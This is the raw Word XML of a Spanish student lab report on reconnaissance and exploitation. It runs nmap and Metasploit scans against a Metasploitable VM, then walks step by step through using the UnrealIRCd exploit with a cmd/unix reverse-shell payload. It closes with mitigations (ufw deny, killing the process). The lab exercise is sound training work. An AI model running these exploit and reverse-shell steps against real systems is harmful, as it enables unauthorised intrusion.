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DD21F" w14:textId="48BD7F77" w:rsidR="00250316" w:rsidRPr="00AA1829" w:rsidRDefault="0005398D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1829">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Análisis y explotación de vulnerabilidades</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330F36A6" w14:textId="4CFCFF16" w:rsidR="00E06BE3" w:rsidRDefault="00E06BE3">
      <w:r>
        <w:t xml:space="preserve">Apartado </w:t>
      </w:r>
      <w:r w:rsidR="00AA1829">
        <w:t xml:space="preserve">1: </w:t>
      </w:r>
      <w:r w:rsidR="00AA1829" w:rsidRPr="000D140A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>FingerPrinting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D2CED4" w14:textId="6DA5E3BE" w:rsidR="00AA1829" w:rsidRPr="00E446EC" w:rsidRDefault="00AA1829">
      <w:r>
        <w:t xml:space="preserve">Antes de iniciar un escaneo en </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
        <w:t>METASPLOIT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, primero se debe iniciar el servicio de </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1829">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>postgresql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ejecutando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo service postgresql start</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Se puede verificar el estado del servicio ejecutando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>service postgresql</w:t>
      </w:r>
      <w:r w:rsidR="00E446EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> status</w:t>
      </w:r>
      <w:r w:rsidR="00E446EC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F58A2F" w14:textId="420A31CE" w:rsidR="00AA1829" w:rsidRDefault="00AA1829">
      <w:r w:rsidRPr="00AA1829">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="661C613F" wp14:editId="4F45EF02">
            <wp:extent cx="5400040" cy="17564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7DE3" w14:textId="11B3E590" w:rsidR="006C7FD6" w:rsidRDefault="006C7FD6">
      <w:r>
        <w:t xml:space="preserve">Luego se conecta con la base de datos ejecutando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo msfdb init</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266F606D" w14:textId="048AF907" w:rsidR="006C7FD6" w:rsidRDefault="006C7FD6">
      <w:r w:rsidRPr="006C7FD6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="575071DD" wp14:editId="442D1CBA">
            <wp:extent cx="5311600" cy="1348857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3FCE" w14:textId="29501C54" w:rsidR="000D3C61" w:rsidRDefault="000D3C61">
      <w:r>
        <w:t xml:space="preserve">Para entrar a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>METASPLOIT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, se ejecuta </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Luego se ejecuta </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>db_status</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> para comprobar que todo está correcto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600F60AD" w14:textId="6A0587B8" w:rsidR="000D3C61" w:rsidRDefault="000D3C61">
      <w:r w:rsidRPr="000D3C61">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C3696CC" wp14:editId="62595170">
            <wp:extent cx="3357676" cy="350837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59" cy="352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9C18" w14:textId="08CF944B" w:rsidR="009A4255" w:rsidRDefault="009A4255">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Para poder escanear, primero se debe conocer la red en la se encuentra, para ello se ejecuta </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ip a</w:t>
      </w:r>
      <w:r w:rsidR="00F64184">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A0CBFA" w14:textId="22BD239A" w:rsidR="009A4255" w:rsidRDefault="009A4255">
      <w:r w:rsidRPr="009A4255">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C6E18F3" wp14:editId="13143A9E">
            <wp:extent cx="4053385" cy="596427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3473" cy="60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7DBF" w14:textId="465F7AD7" w:rsidR="00710147" w:rsidRPr="00631484" w:rsidRDefault="00710147">
      <w:r>
        <w:t xml:space="preserve">Ahora que se conoce la red, para poder escanear hosts, se realiza fuera de msfconsole un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">nmap </w:t>
      </w:r>
      <w:r w:rsidR="00631484">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">-oX hosts.xml </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>192.162.60.0/24</w:t>
      </w:r>
      <w:r w:rsidR="00631484">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00631484">
        <w:t>donde el resultado del escaneo, se guardará en un archivo XML</w:t>
      </w:r>
      <w:r w:rsidR="00870AE2">
        <w:t xml:space="preserve"> para posteriormente exportarlo a metasploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00631484">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C00CFEA" w14:textId="40E4DE62" w:rsidR="00631484" w:rsidRDefault="00631484">
      <w:r w:rsidRPr="00631484">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DCAD621" wp14:editId="70E9913C">
            <wp:extent cx="3575714" cy="4585093"/>
            <wp:effectExtent l="0" t="0" r="5715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8321" cy="461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B9F" w14:textId="0122488E" w:rsidR="00631484" w:rsidRPr="00631484" w:rsidRDefault="00631484">
      <w:r>
        <w:t xml:space="preserve">Dentro de msfconsole, se ejecuta </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>db_import hosts.xml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> para que se cargue la información a </w:t>
      </w:r>
      <w:r w:rsidR="00870AE2">
        <w:t>metasploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Luego se ejecuta </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hosts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> para poder ver la lista de hosts escaneada previamente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF47AF3" w14:textId="5B9C0309" w:rsidR="00631484" w:rsidRDefault="00631484">
      <w:r w:rsidRPr="00631484">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08ED30C3" wp14:editId="2E8565B1">
            <wp:extent cx="3862317" cy="1866887"/>
            <wp:effectExtent l="0" t="0" r="508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703" cy="189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5FEB" w14:textId="1FF65CEF" w:rsidR="00350F81" w:rsidRDefault="00350F81">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Para realizar un escaneo más profundo, se ejecutó el mismo comando, solo que con el parámetro -sV para ver los servicios y su versión </w:t>
      </w:r>
      <w:r w:rsidR="005420E9">
        <w:t xml:space="preserve">con su puerto </w:t>
      </w:r>
      <w:r>
        <w:t>y -O para ver el sistema operativo</w:t>
      </w:r>
      <w:r w:rsidR="005420E9">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4361071C" w14:textId="0BD9FBFA" w:rsidR="00350F81" w:rsidRDefault="00350F81">
      <w:r w:rsidRPr="00350F81">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78CF195D" wp14:editId="3C0D0C42">
            <wp:extent cx="2415749" cy="289585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F97" w14:textId="646EAD40" w:rsidR="00350F81" w:rsidRDefault="00350F81">
      <w:r>
        <w:t>Entre los hosts, se destaca el metasploitable</w:t>
      </w:r>
      <w:r w:rsidR="00870AE2">
        <w:t xml:space="preserve"> junto con su sistema operativo que es Linux</w:t>
      </w:r>
      <w:r w:rsidR="005420E9">
        <w:t>, sus servicios activos, versión y puerto</w:t>
      </w:r>
      <w:r w:rsidR="00870AE2">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4304DDD8" w14:textId="3C48A642" w:rsidR="00350F81" w:rsidRDefault="00350F81">
      <w:r w:rsidRPr="00350F81">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="066FB90A" wp14:editId="1D81897A">
            <wp:extent cx="5400040" cy="302577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F51D" w14:textId="5D8DD004" w:rsidR="00350F81" w:rsidRDefault="00350F81">
      <w:r>
        <w:t xml:space="preserve">También se puede ver los servicios y puertos dentro de msfconsole ejecutando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2472029F" w14:textId="0B418341" w:rsidR="00350F81" w:rsidRPr="00350F81" w:rsidRDefault="00350F81">
      <w:r w:rsidRPr="00350F81">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B550A69" wp14:editId="387D4805">
            <wp:extent cx="3452159" cy="36960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7149" w14:textId="3635B07F" w:rsidR="000D3C61" w:rsidRDefault="00204B55">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Para ver los puertos abiertos de metasploitable, se ejecuta nmap -sT 192.168.66.166 porque ya se conoce el host objetivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C0BC9F" w14:textId="5DAA4201" w:rsidR="00204B55" w:rsidRDefault="00204B55">
      <w:r w:rsidRPr="00204B55">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B83C287" wp14:editId="18CAA4B0">
            <wp:extent cx="4092295" cy="3939881"/>
            <wp:effectExtent l="0" t="0" r="381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0943" w14:textId="66091131" w:rsidR="00C76343" w:rsidRDefault="00C76343">
      <w:r>
        <w:t>También se puede realizar un escaneo silencioso agregando el parámetro -sS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E577AB" w14:textId="04F95DA6" w:rsidR="00C76343" w:rsidRDefault="00C76343">
      <w:r w:rsidRPr="00C76343">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6340FEF7" wp14:editId="41260CEB">
            <wp:extent cx="5400040" cy="348297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6445" w14:textId="4C2309AA" w:rsidR="005420E9" w:rsidRPr="00B83218" w:rsidRDefault="005420E9">
      <w:r>
        <w:t xml:space="preserve">Para escanear el puerto 80 en modo locura, se ejecuta </w:t>
      </w:r>
      <w:r w:rsidR="000E148D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nmap -p 80 -T5 192.168.66.166</w:t>
      </w:r>
      <w:r w:rsidR="00B83218">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B83218">
        <w:t xml:space="preserve">donde el parámetro -p indica el puerto a escanear y -T5 que sea en modo locura. El modo locura </w:t>
      </w:r>
      <w:r w:rsidR="00B83218">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">significa que se hace un escaneo más rápido y agresivo enviando paquetes lo más rápido posible, sin </w:t>
      </w:r>
      <w:r w:rsidR="006C66F8">
        <w:t>embargo,</w:t>
      </w:r>
      <w:r w:rsidR="00B83218">
        <w:t xml:space="preserve"> aumenta la posibilidad de perder paquetes o activar sistemas de detección de intrusos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659A78E0" w14:textId="7736A94E" w:rsidR="000E148D" w:rsidRDefault="000E148D">
      <w:r w:rsidRPr="000E148D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A51CE05" wp14:editId="4F5954C2">
            <wp:extent cx="4122777" cy="127265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FA6B" w14:textId="1A162E81" w:rsidR="006C66F8" w:rsidRDefault="006C66F8">
      <w:r>
        <w:t xml:space="preserve">Para usar znamp se instala con </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo apt install zenmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, donde luego se escribe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo zenmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> en la terminal para abrir el programa. Una vez abierto el programa, </w:t>
      </w:r>
      <w:r w:rsidR="0026647E">
        <w:t xml:space="preserve">en </w:t>
      </w:r>
      <w:r w:rsidR="0026647E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:r w:rsidR="0026647E">
        <w:t xml:space="preserve"> se selecciona la red objetivo que es 192.168.66.0/24, luego se escanea. Cuando termina el escaneo en la parte izquierda, se pueden ver los hosts escaneados junto con su sistema operativo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6002BE30" w14:textId="0D85A160" w:rsidR="0026647E" w:rsidRDefault="0026647E">
      <w:r w:rsidRPr="0026647E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36BE5435" wp14:editId="2365A55D">
            <wp:extent cx="6287273" cy="297728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99" cy="298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018D" w14:textId="1C07207A" w:rsidR="006D734C" w:rsidRDefault="006D734C" w:rsidP="006D734C">
      <w:r>
        <w:t xml:space="preserve">Apartado </w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D140A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>entesting</w:t>
      </w:r>
      <w:r w:rsidR="00FB51B4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>. Análisis y explotación de vulnerabilidad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8CA961" w14:textId="704B8688" w:rsidR="0026647E" w:rsidRDefault="007C5E44">
      <w:r>
        <w:t>Para realizar un escaneo de vulnerabilidades sobre la máquina metasplotable, se ejecuta nmap -sV 192.168.60.166.</w:t>
      </w:r>
      <w:r w:rsidR="001E480E">
        <w:t xml:space="preserve"> Algunas de las vulnerabilidades detectadas son el servicio FTP, SAMBA, Postgresql, SSH, Telnet entre otros.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C37AFD5" w14:textId="7FF7FB60" w:rsidR="007C5E44" w:rsidRDefault="007C5E44">
      <w:r w:rsidRPr="007C5E44">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D4F8789" wp14:editId="11353217">
            <wp:extent cx="4923692" cy="2870031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887" cy="28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8231" w14:textId="28EDAC09" w:rsidR="008D2365" w:rsidRDefault="00084B09">
      <w:r>
        <w:t xml:space="preserve">Por ejemplo, se </w:t>
      </w:r>
      <w:r w:rsidR="000862FE">
        <w:t>intentará</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003C3F1F">
        <w:t>abrir una shell, para ello se busca un exploit que vulnere dicho servicio con search UnrealIRCd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6B4864" w14:textId="297385C8" w:rsidR="000862FE" w:rsidRDefault="003C3F1F">
      <w:r w:rsidRPr="003C3F1F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FE0219F" wp14:editId="00146F9E">
            <wp:extent cx="4900246" cy="80499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885" cy="8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D05C" w14:textId="1B1A476E" w:rsidR="000862FE" w:rsidRDefault="000862FE">
      <w:r>
        <w:t>Como en este caso es el único, se lo elije con use 0</w:t>
      </w:r>
      <w:r w:rsidR="003C3F1F">
        <w:t xml:space="preserve"> y luego se ven las opciones del exploit con show options.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A32FD6F" w14:textId="1F14B35A" w:rsidR="003C3F1F" w:rsidRDefault="003C3F1F">
      <w:r w:rsidRPr="003C3F1F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E91B427" wp14:editId="2084F31C">
            <wp:extent cx="4906108" cy="1589408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1101" cy="15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82D" w14:textId="7DD08BEB" w:rsidR="003C3F1F" w:rsidRDefault="003C3F1F">
      <w:r>
        <w:t>Como se puede ver, es requerido ingresar la máquina objetivo, asi que se escribe set RHOSTS 192.168.60.166.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4494B0A7" w14:textId="7CBB86E0" w:rsidR="003C3F1F" w:rsidRDefault="003C3F1F">
      <w:r w:rsidRPr="003C3F1F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67DFA8E5" wp14:editId="0A9E7A03">
            <wp:extent cx="4876800" cy="1655611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3151" cy="165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2BA6" w14:textId="58886E33" w:rsidR="003C3F1F" w:rsidRDefault="003C3F1F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ahora se va a escoger un payload (que es lo que va a hacer luego de haber aprovechado con éxito la vulnerabilidad) para poder abrir una shell. Para ver los payloads se ejecuta show payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F8775E" w14:textId="32608900" w:rsidR="003C3F1F" w:rsidRDefault="00807ED7">
      <w:r w:rsidRPr="00807ED7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C74A476" wp14:editId="46F195E6">
            <wp:extent cx="5400040" cy="1614805"/>
            <wp:effectExtent l="0" t="0" r="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8B5D" w14:textId="2576162B" w:rsidR="001E2A6F" w:rsidRDefault="001E2A6F">
      <w:r>
        <w:t xml:space="preserve">Entre </w:t>
      </w:r>
      <w:r w:rsidR="00807ED7">
        <w:t xml:space="preserve">varios payloads se elige el numero 6 </w:t>
      </w:r>
      <w:r w:rsidR="009C3E5D">
        <w:t>porque CMD significa ejecutara un comando de shell básico, UNIX porque esta diseñado para sistemas UNIX y REVERSE el tipo de conexión donde la maquina remota establecerá conexión con la máquina local. Se lo selecciona con set payload 6.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3D384D" w14:textId="31039D55" w:rsidR="009C3E5D" w:rsidRDefault="009C3E5D">
      <w:r w:rsidRPr="009C3E5D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72B78FFB" wp14:editId="4C90106D">
            <wp:extent cx="5400040" cy="2431415"/>
            <wp:effectExtent l="0" t="0" r="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4298" w14:textId="7CF2CBC2" w:rsidR="009C3E5D" w:rsidRDefault="009C3E5D">
      <w:r>
        <w:t xml:space="preserve">Ahora nos aparece que se tiene que configurar el LHOST que es la maquina local al la que se </w:t>
      </w:r>
      <w:r w:rsidR="002C2C53">
        <w:t>establecerá</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> conexión con la máquina remota. Se escribe set LHOST 192.168.60</w:t>
      </w:r>
      <w:r w:rsidR="002C2C53">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BD308A">
        <w:t>165.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547C64EF" w14:textId="04DFABA3" w:rsidR="002C2C53" w:rsidRDefault="002C2C53">
      <w:r w:rsidRPr="002C2C53">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BF609F6" wp14:editId="187868E1">
            <wp:extent cx="5400040" cy="2435860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319B" w14:textId="23F43ED3" w:rsidR="005F54B1" w:rsidRDefault="005F54B1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ahora que todas las opciones requeridas están escritas, se inicia el exploit con exploit. Una vez dentro de la shell.</w:t>
      </w:r>
      <w:r w:rsidR="00012F93">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADCC4C6" w14:textId="3C3D44FE" w:rsidR="005F54B1" w:rsidRDefault="005F54B1">
      <w:r w:rsidRPr="005F54B1">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50376AAC" wp14:editId="55A529B1">
            <wp:extent cx="5400040" cy="17919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8803" w14:textId="70A8E669" w:rsidR="005F54B1" w:rsidRDefault="00012F93">
      <w:r w:rsidRPr="00012F93">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FECC480" wp14:editId="293B34C6">
            <wp:extent cx="1455546" cy="510584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30B9" w14:textId="33B035E8" w:rsidR="001F789A" w:rsidRDefault="001F789A">
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:t>entro de la shell se puede ejecutar background para dejar la sesión abierto en segundo plano y continuar con otras operaciones</w:t>
      </w:r>
      <w:r w:rsidR="00911820">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A23D51B" w14:textId="65224E1B" w:rsidR="001F789A" w:rsidRDefault="001F789A">
      <w:r w:rsidRPr="001F789A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="701B4709" wp14:editId="49B20439">
            <wp:extent cx="5400040" cy="871220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613A" w14:textId="1F818428" w:rsidR="00012F93" w:rsidRDefault="00012F93">
      <w:r>
        <w:t>Para que esto no pueda ser vulnerado de nuevo, lo más sencillo ser</w:t>
      </w:r>
      <w:r w:rsidR="000035A3">
        <w:t>ía</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> no dejar los puertos abiertos a la escucha de cualquier petición. Como prueba se cerrará el puerto</w:t>
      </w:r>
      <w:r w:rsidR="000035A3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002C678A">
        <w:t>del servicio (6667/tcp). Primero se ven los puertos abiertos con sudo netstat -tuln.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B7B1B2" w14:textId="4D6E7E7F" w:rsidR="002C678A" w:rsidRDefault="002C678A">
      <w:r w:rsidRPr="002C678A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22F7B6BD" wp14:editId="142A3A05">
            <wp:extent cx="4618120" cy="3894157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AC88" w14:textId="42732C42" w:rsidR="005F54B1" w:rsidRDefault="001F789A">
      <w:r>
        <w:t>Para bloquear el puerto se ejecuta sudo ufw deny 6667</w:t>
      </w:r>
      <w:r w:rsidR="00EB462C">
        <w:t>/tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A03DE1" w14:textId="69EBC792" w:rsidR="001F789A" w:rsidRDefault="00EB462C">
      <w:r w:rsidRPr="00EB462C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C271142" wp14:editId="61CE0AE2">
            <wp:extent cx="1417443" cy="243861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0F19" w14:textId="3A314210" w:rsidR="00465EF0" w:rsidRDefault="000F627D">
      <w:r>
        <w:t>O también se puede buscar el servicio que utiliza el puerto 6667 con sudo lsof -i :6667. Luego de obtener los PID, se matan los procesos con sudo kill -9 [PID].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AD2D68" w14:textId="4933FA24" w:rsidR="00465EF0" w:rsidRDefault="000F627D">
      <w:r w:rsidRPr="000F627D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A101C27" wp14:editId="071505A6">
            <wp:extent cx="3970364" cy="1104996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6CEA" w14:textId="085D44F6" w:rsidR="000F627D" w:rsidRDefault="000F627D">
      <w:r>
        <w:t>Ahora que los procesos no están activos, se intenta usar el exploit de nuevo y esta vez no funciona.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C13190D" w14:textId="0550C43C" w:rsidR="000F627D" w:rsidRPr="0026647E" w:rsidRDefault="000F627D">
      <w:r w:rsidRPr="000F627D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0684EDAB" wp14:editId="349E719E">
            <wp:extent cx="3817951" cy="1028789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27D" w:rsidRPr="002664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69"/>
    <w:rsid w:val="000035A3"/>
    <w:rsid w:val="00012F93"/>
    <w:rsid w:val="0005398D"/>
    <w:rsid w:val="00084B09"/>
    <w:rsid w:val="000862FE"/>
    <w:rsid w:val="000D140A"/>
    <w:rsid w:val="000D3C61"/>
    <w:rsid w:val="000E148D"/>
    <w:rsid w:val="000F627D"/>
    <w:rsid w:val="001E2A6F"/>
    <w:rsid w:val="001E480E"/>
    <w:rsid w:val="001F789A"/>
    <w:rsid w:val="00204B55"/>
    <w:rsid w:val="00250316"/>
    <w:rsid w:val="0026647E"/>
    <w:rsid w:val="002C2C53"/>
    <w:rsid w:val="002C678A"/>
    <w:rsid w:val="00350F81"/>
    <w:rsid w:val="003C3F1F"/>
    <w:rsid w:val="00465EF0"/>
    <w:rsid w:val="005420E9"/>
    <w:rsid w:val="005F54B1"/>
    <w:rsid w:val="00631484"/>
    <w:rsid w:val="006C66F8"/>
    <w:rsid w:val="006C7FD6"/>
    <w:rsid w:val="006D734C"/>
    <w:rsid w:val="00710147"/>
    <w:rsid w:val="007C5E44"/>
    <w:rsid w:val="00807ED7"/>
    <w:rsid w:val="00870AE2"/>
    <w:rsid w:val="008D2365"/>
    <w:rsid w:val="00911820"/>
    <w:rsid w:val="009A4255"/>
    <w:rsid w:val="009C3E5D"/>
    <w:rsid w:val="00A2799C"/>
    <w:rsid w:val="00AA1829"/>
    <w:rsid w:val="00B83218"/>
    <w:rsid w:val="00B94069"/>
    <w:rsid w:val="00B97B5B"/>
    <w:rsid w:val="00BD308A"/>
    <w:rsid w:val="00C25069"/>
    <w:rsid w:val="00C76343"/>
    <w:rsid w:val="00E06BE3"/>
    <w:rsid w:val="00E446EC"/>
    <w:rsid w:val="00E52AE7"/>
    <w:rsid w:val="00E84A5C"/>
    <w:rsid w:val="00EB462C"/>
    <w:rsid w:val="00F64184"/>
    <w:rsid w:val="00FB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F498"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{715FAEB8-F947-4A9F-85BE-BD5CD148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3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9</Pages>
  <Words>685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39</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-11-02T18:09:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-09T18:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>